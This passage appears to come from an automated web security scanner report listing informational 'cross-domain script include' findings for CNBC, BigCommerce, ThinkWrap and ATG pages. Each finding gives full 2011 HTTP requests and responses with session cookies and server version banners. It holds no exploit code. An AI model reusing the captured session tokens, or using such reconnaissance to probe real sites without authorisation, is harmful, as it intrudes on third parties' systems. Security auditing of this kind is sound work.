<link href="/css/member_center_sytles.css" rel="stylesheet" typ
...[SNIP]...
</style>
<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...

20.54. http://search.cnbc.com/main.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.cnbc.com
Path:   /main.do

Issue detail

The response dynamically includes the following scripts from other domains:

Request

POST /main.do?target=all&keywords=xss&categories=exclude HTTP/1.1
Host: search.cnbc.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
Content-Length: 18
Cache-Control: max-age=0
Origin: http://www.cnbc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; TZM=-300; adops_master_kvs=; snas_noinfo=1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1315339005443; __qseg=Q_D

searchboxinput=xss

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:00 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Type: text/html
Via: 1.1 aicache6
Content-Length: 84619
X-Aicache-OS: 64.210.194.248:80
Connection: Keep-Alive
Keep-Alive: max=20

<html>
<head>
<!-- Adding velocity template for meta tags -->

<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta name="description" content="CNBC Search, xss">
<meta name=
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/id/29755670">
<script language="javascript"
src="http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js?rti=200914"></script>
...[SNIP]...
<!-- Pixelman Tracking -->
<script src="http://www.nbcudigitaladops.com/hosted/global_header.js" language="JavaScript"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
<div pcid="0" style="padding-bottom:px;"><script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
<!-- Pixelman Tracking -->
<script src="http://www.nbcudigitaladops.com/hosted/global.js" language="JavaScript"></script>
...[SNIP]...

20.55. http://support.bigcommerce.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://support.bigcommerce.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: support.bigcommerce.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: roi_visitor=visitorid%3D1421498772%7Cfirstvisit%3D2011-09-06+10%3A32%3A12%7Cquery%3DATG%2Be-commerce%2Bsolutio%7Creferer%3Dwww.google.com%7Clandingpage%3D%2Flp%2Fe1-lp-ecommerce.php; roi_attribution=firstclick%3D2011-09-06+10%3A32%3A12%7Csource%3Dgoogle%7Cmedium%3Dcpc%7Ccampaign%3D%28roi%29+ecommerce%7Cadgroup%3Decommerce+solutions%7Ckeyword%3De+commerce+solutions%7Csitelinks%3D%7Ccreative%3D%7Ctaggedquery%3DATG%2Be-commerce%2Bsolutio%7Ctaggedreferer%3Dwww.google.com%7Ctaggedlandingpage%3D%2Flp%2Fe1-lp-ecommerce.php; __utmz=41658941.1315341506.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 2__utmz=^first.1331109506396:41658941.1315341506.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 2__utma=^first.1378413574929:41658941.1556216253.1315341506.1315341506.1315341506.1; 2__utmb=^first.1315343374929:41658941.6.10.1315341506; 2__utmc=^first.1378413574929:41658941; __utma=41658941.485543067.1315341506.1315341506.1315341506.1; __utmb=41658941.13.10.1315341506; __utmc=41658941

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:39:39 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 40722
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <meta http-equiv="Content-type" cont
...[SNIP]...
</div>
   <script src="https://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...
</div>
   <script src="http://www.google.com/cse/query_renderer.js"></script>
   <script src="http://www.google.com/cse/api/008313234753726960933/cse/s6m3qtfkxlu/queries/js?callback=(new+PopularQueryRenderer(document.getElementById(%22queries%22))).render"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

20.56. https://support.bigcommerce.com/questions/1127/How+do+I+Setup+SocialShop+%28v2%29+Application+in+Facebook%3F

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.bigcommerce.com
Path:   /questions/1127/How+do+I+Setup+SocialShop+%28v2%29+Application+in+Facebook%3F

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /questions/1127/How+do+I+Setup+SocialShop+%28v2%29+Application+in+Facebook%3F HTTP/1.1
Host: support.bigcommerce.com
Connection: keep-alive
Referer: http://support.bigcommerce.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: roi_visitor=visitorid%3D1421498772%7Cfirstvisit%3D2011-09-06+10%3A32%3A12%7Cquery%3DATG%2Be-commerce%2Bsolutio%7Creferer%3Dwww.google.com%7Clandingpage%3D%2Flp%2Fe1-lp-ecommerce.php; roi_attribution=firstclick%3D2011-09-06+10%3A32%3A12%7Csource%3Dgoogle%7Cmedium%3Dcpc%7Ccampaign%3D%28roi%29+ecommerce%7Cadgroup%3Decommerce+solutions%7Ckeyword%3De+commerce+solutions%7Csitelinks%3D%7Ccreative%3D%7Ctaggedquery%3DATG%2Be-commerce%2Bsolutio%7Ctaggedreferer%3Dwww.google.com%7Ctaggedlandingpage%3D%2Flp%2Fe1-lp-ecommerce.php; __utmz=41658941.1315341506.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 2__utmz=^first.1331109506396:41658941.1315341506.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=95sh21hkr74gpcp03q1tinf0b1k1muq3; 2__utma=^first.1378413579147:41658941.1556216253.1315341506.1315341506.1315341506.1; 2__utmb=^first.1315343379147:41658941.7.10.1315341506; 2__utmc=^first.1378413579147:41658941; __utma=41658941.485543067.1315341506.1315341506.1315341506.1; __utmb=41658941.16.10.1315341506; __utmc=41658941

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:39:46 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 44195
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <meta http-equiv="Content-type" cont
...[SNIP]...
</div>
   <script src="https://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...
</div>
   <script src="http://www.google.com/cse/query_renderer.js"></script>
   <script src="http://www.google.com/cse/api/008313234753726960933/cse/s6m3qtfkxlu/queries/js?callback=(new+PopularQueryRenderer(document.getElementById(%22queries%22))).render"></script>
...[SNIP]...
</script>
                       <script type="text/javascript" src="https://static.addtoany.com/menu/page.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

20.57. http://thinkwrap.com/contact/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://thinkwrap.com
Path:   /contact/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /contact/ HTTP/1.1
Host: thinkwrap.com
Proxy-Connection: keep-alive
Referer: http://thinkwrap.com/ourfocus/location-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=111454529.667789240.1315341151.1315341151.1315341151.1; __utmb=111454529.4.10.1315341151; __utmc=111454529; __utmz=111454529.1315341151.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:36:59 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
X-Pingback: http://thinkwrap.com/xmlrpc.php
Vary: Accept-Encoding
Content-Length: 13750
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<!--BEGIN html-->
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

...[SNIP]...
<link rel='stylesheet' id='sexy-bookmarks-css' href='http://www.bareagency.ca/wp-content/plugins/sexybookmarks/spritegen/shr-custom-sprite.css?ver=3.3.12' type='text/css' media='all' />
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js?ver=2.9.2'></script>
...[SNIP]...

20.58. http://thinkwrap.com/ourfocus/atg-ecommerce-solutions-partner/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://thinkwrap.com
Path:   /ourfocus/atg-ecommerce-solutions-partner/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /ourfocus/atg-ecommerce-solutions-partner/ HTTP/1.1
Host: thinkwrap.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ATG+e-commerce+solutio
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:33 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
X-Pingback: http://thinkwrap.com/xmlrpc.php
Vary: Accept-Encoding
Content-Length: 17935
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<!--BEGIN html-->
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

...[SNIP]...
<link rel='stylesheet' id='sexy-bookmarks-css' href='http://www.bareagency.ca/wp-content/plugins/sexybookmarks/spritegen/shr-custom-sprite.css?ver=3.3.12' type='text/css' media='all' />
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js?ver=2.9.2'></script>
...[SNIP]...

20.59. http://thinkwrap.com/ourfocus/location-services/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://thinkwrap.com
Path:   /ourfocus/location-services/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /ourfocus/location-services/ HTTP/1.1
Host: thinkwrap.com
Proxy-Connection: keep-alive
Referer: http://thinkwrap.com/ourfocus/atg-ecommerce-solutions-partner/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=111454529.667789240.1315341151.1315341151.1315341151.1; __utmb=111454529.2.10.1315341151; __utmc=111454529; __utmz=111454529.1315341151.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:35:38 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
X-Pingback: http://thinkwrap.com/xmlrpc.php
Vary: Accept-Encoding
Content-Length: 18336
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<!--BEGIN html-->
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

...[SNIP]...
<link rel='stylesheet' id='sexy-bookmarks-css' href='http://www.bareagency.ca/wp-content/plugins/sexybookmarks/spritegen/shr-custom-sprite.css?ver=3.3.12' type='text/css' media='all' />
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js?ver=2.9.2'></script>
...[SNIP]...

20.60. http://thinkwrap.com/wp-content/uploads/2010/07/bg-header-nav-men.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://thinkwrap.com
Path:   /wp-content/uploads/2010/07/bg-header-nav-men.png

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wp-content/uploads/2010/07/bg-header-nav-men.png HTTP/1.1
Host: thinkwrap.com
Proxy-Connection: keep-alive
Referer: http://thinkwrap.com/ourfocus/atg-ecommerce-solutions-partner/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not found
Date: Tue, 06 Sep 2011 15:32:47 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
X-Pingback: http://thinkwrap.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 15:32:49 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 14268
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<!--BEGIN html-->
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

...[SNIP]...
<link rel='stylesheet' id='sexy-bookmarks-css' href='http://www.bareagency.ca/wp-content/plugins/sexybookmarks/spritegen/shr-custom-sprite.css?ver=3.3.12' type='text/css' media='all' />
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js?ver=2.9.2'></script>
...[SNIP]...

20.61. http://thinkwrap.com/wp-content/uploads/2010/07/bg-header-su-menu.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://thinkwrap.com
Path:   /wp-content/uploads/2010/07/bg-header-su-menu.gif

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wp-content/uploads/2010/07/bg-header-su-menu.gif HTTP/1.1
Host: thinkwrap.com
Proxy-Connection: keep-alive
Referer: http://thinkwrap.com/ourfocus/atg-ecommerce-solutions-partner/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not found
Date: Tue, 06 Sep 2011 15:32:48 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
X-Pingback: http://thinkwrap.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 15:32:53 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 14268
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<!--BEGIN html-->
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

...[SNIP]...
<link rel='stylesheet' id='sexy-bookmarks-css' href='http://www.bareagency.ca/wp-content/plugins/sexybookmarks/spritegen/shr-custom-sprite.css?ver=3.3.12' type='text/css' media='all' />
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js?ver=2.9.2'></script>
...[SNIP]...

20.62. http://www.atg.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.atg.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.atg.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ATG+e-commerce+solutio
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xLEV4dHJhc2l0ZS85LjEsSUFGLzkuMSxBQ08vOS4xLFNlcnZpY2UvOS4xLENBRi85LjEgWyBEUFNMaWNlbnNlLzAgQjJDTGljZW5zZS8wIFBvcnRhbExpY2Vuc2UvMCBTZWxmU2VydmljZUxpY2Vuc2UvMCAgXQ==
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Expires: Tue, 06 Sep 2011 15:32:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 15:32:21 GMT
Content-Length: 53080
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<l
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/stylesheets/safari-fixes.css?version=5">
<script type="text/javascript" src="https://static.atgsvcs.com/js/atgsvcs.js"></script>
...[SNIP]...

20.63. http://www.atg.com/en/solutions/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.atg.com
Path:   /en/solutions/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en/solutions/ HTTP/1.1
Host: www.atg.com
Proxy-Connection: keep-alive
Referer: http://www.atg.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=7BEBA85DDD3B09D2BB095640CBA3C203.22; __utma=254092376.212551518.1315341136.1315341136.1315341136.1; __utmb=254092376.1.10.1315341136; __utmc=254092376; __utmz=254092376.1315341136.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio; __ngt_ses=445D9FA4; __ngt_cli=8778554336C857464473DAAC; __ngt_ref=google%2BATG%2520e-commerce%2520solutio; _mkto_trk=id:904-KUW-942&token:_mch-atg.com-1315341137119-43295

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xLEV4dHJhc2l0ZS85LjEsSUFGLzkuMSxBQ08vOS4xLFNlcnZpY2UvOS4xLENBRi85LjEgWyBEUFNMaWNlbnNlLzAgQjJDTGljZW5zZS8wIFBvcnRhbExpY2Vuc2UvMCBTZWxmU2VydmljZUxpY2Vuc2UvMCAgXQ==
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Expires: Tue, 06 Sep 2011 15:35:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 15:35:05 GMT
Content-Length: 42222
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
   <meta http-equiv="Content-type" content="text/html; charset=utf-8">
   
   <title>ATG Commerce So
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/stylesheets/safari-fixes.css?version=5">
   <script type="text/javascript" src="https://static.atgsvcs.com/js/atgsvcs.js"></script>
...[SNIP]...

20.64. http://www.atg.com/service/main.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.atg.com
Path:   /service/main.jsp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /service/main.jsp?t=searchTab&dosearch=true&SearchButton=Find&searchstring=xss+faq+help&search=GO HTTP/1.1
Host: www.atg.com
Proxy-Connection: keep-alive
Referer: http://www.atg.com/en/solutions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=7BEBA85DDD3B09D2BB095640CBA3C203.22; __ngt_ses=445D9FA4; __ngt_cli=8778554336C857464473DAAC; __ngt_ref=google%2BATG%2520e-commerce%2520solutio; sifrFetch=true; __utma=254092376.212551518.1315341136.1315341136.1315341136.1; __utmb=254092376.2.10.1315341136; __utmc=254092376; __utmz=254092376.1315341136.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio; _mkto_trk=id:904-KUW-942&token:_mch-atg.com-1315341137119-43295

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xLEV4dHJhc2l0ZS85LjEsSUFGLzkuMSxBQ08vOS4xLFNlcnZpY2UvOS4xLENBRi85LjEgWyBEUFNMaWNlbnNlLzAgQjJDTGljZW5zZS8wIFBvcnRhbExpY2Vuc2UvMCBTZWxmU2VydmljZUxpY2Vuc2UvMCAgXQ==
Content-Language: en-US
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Expires: Tue, 06 Sep 2011 15:35:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 15:35:19 GMT
Content-Length: 110653
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- $Id: //application/service/version/9.1/SelfService/src/web-apps/SelfSe
...[SNIP]...
</div>
<script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

20.65. https://www.atg.com/en/customers/listing/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.atg.com
Path:   /en/customers/listing/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en/customers/listing/ HTTP/1.1
Host: www.atg.com
Connection: keep-alive
Referer: https://www.atg.com/en/password/request/?successURL=/en/password/request/success/&_requestid=161697
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ngt_ses=445D9FA4; __ngt_cli=8778554336C857464473DAAC; __ngt_ref=google%2BATG%2520e-commerce%2520solutio; sifrFetch=true; __utma=254092376.212551518.1315341136.1315341136.1315341136.1; __utmb=254092376.2.10.1315341136; __utmc=254092376; __utmz=254092376.1315341136.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio; _mkto_trk=id:904-KUW-942&token:_mch-atg.com-1315341137119-43295; JSESSIONID=7BEBA85DDD3B09D2BB095640CBA3C203.22

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xLEV4dHJhc2l0ZS85LjEsSUFGLzkuMSxBQ08vOS4xLFNlcnZpY2UvOS4xLENBRi85LjEgWyBEUFNMaWNlbnNlLzAgQjJDTGljZW5zZS8wIFBvcnRhbExpY2Vuc2UvMCBTZWxmU2VydmljZUxpY2Vuc2UvMCAgXQ==
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Expires: Tue, 06 Sep 2011 15:56:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 15:56:47 GMT
Content-Length: 49691
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
   <meta http-equiv="Content-type" content="text/html; charset=utf-8">
   
   <title>ATG Customers</
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/stylesheets/safari-fixes.css?version=5">
   <script type="text/javascript" src="https://static.atgsvcs.com/js/atgsvcs.js"></script>
...[SNIP]...

20.66. https://www.atg.com/en/password/request/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.atg.com
Path:   /en/password/request/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en/password/request/ HTTP/1.1
Host: www.atg.com
Connection: keep-alive
Referer: https://www.atg.com/service/main.jsp?t=homeTab&locale=&_dyncharset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ngt_ses=445D9FA4; __ngt_cli=8778554336C857464473DAAC; __ngt_ref=google%2BATG%2520e-commerce%2520solutio; sifrFetch=true; __utma=254092376.212551518.1315341136.1315341136.1315341136.1; __utmb=254092376.2.10.1315341136; __utmc=254092376; __utmz=254092376.1315341136.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio; _mkto_trk=id:904-KUW-942&token:_mch-atg.com-1315341137119-43295; JSESSIONID=7BEBA85DDD3B09D2BB095640CBA3C203.22

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
